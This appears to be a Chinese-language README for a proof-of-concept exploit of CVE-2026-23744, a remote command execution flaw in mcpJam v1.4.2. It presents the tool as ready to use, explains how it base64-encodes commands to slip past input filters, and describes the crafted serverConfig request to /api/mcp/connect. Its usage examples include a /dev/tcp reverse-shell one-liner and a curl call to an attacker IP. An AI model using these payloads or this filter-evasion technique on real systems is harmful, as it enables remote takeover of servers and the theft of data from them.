keeieb79/CVE-2026-23744-poc

# CVE-2026-23744 — mcpJam 远程代码执行 (RCE) 漏洞利用 这是一个针对 **CVE-2026-23744** 的 Python 3 概念验证漏洞利用程序，该漏洞是一个影响 **mcpJam v1.4.2** 的任意命令执行漏洞。 该工具通过在传输前透明地对命令进行 Base64 编码，实现了 payload 的自动化投递，有助于绕过严格的输入验证和字符过滤机制。该 payload 会在目标系统上通过 `/bin/bash` 包装器进行解码并执行。 ## 功能 ### 自动 Base64 Payload 编码 命令在传输前会自动进行编码，从而在针对实施严格输入验证或字符限制的应用程序时，提高了利用的可靠性。 ### 灵活的命令执行 支持任意命令执行，包括： * 反弹 shell（`sh`、`bash`、`nc` 等） * 系统信息枚举 * 网络连通性测试 * 自定义 payload 投递 ### 详细的调试输出 显示： * 生成的 JSON 请求 payload * 原始服务器响应 这简化了故障排除和漏洞利用验证的过程。 ### 绕过 SSL 验证 抑制证书验证警告，允许与使用自签名或不受信任的 SSL 证书的目标进行交互。 ## 用法 ### 前置条件 安装所需的依赖项： ``` pip install requests ``` ### 语法 ``` python3 exploit.py "" ``` ## 示例 ### 连通性测试 ``` python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888" ``` ### 反弹 Shell ``` python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1" ``` ## 技术细节 该漏洞利用程序通过构造恶意的 `serverConfig` 对象来针对 `/api/mcp/connect` 端点进行攻击。 该工具没有直接传输命令，而是将 payload 转换为 Base64 编码的字符串，并通过 Bash 执行： ``` "args": [ "-c", f"echo {base64_payload} | base64 -d | bash" ] ``` 这种方法有助于规避应用层的过滤，同时确保 payload 在目标主机上被完全解码并执行。 ### 执行流程 1. 用户提供的命令被进行 Base64 编码。 2. 编码后的 payload 被嵌入到 `serverConfig` 请求中。 3. 目标服务器使用 `base64 -d` 解码该 payload。 4. 解码后的命令通过管道直接传递给 `/bin/bash`。 5. 该命令以易受攻击的 mcpJam 进程的权限执行。 ## 免责声明

标签：DNS 反向解析, Python, RCE, 威胁模拟, 无后门, 编程工具, 远程代码执行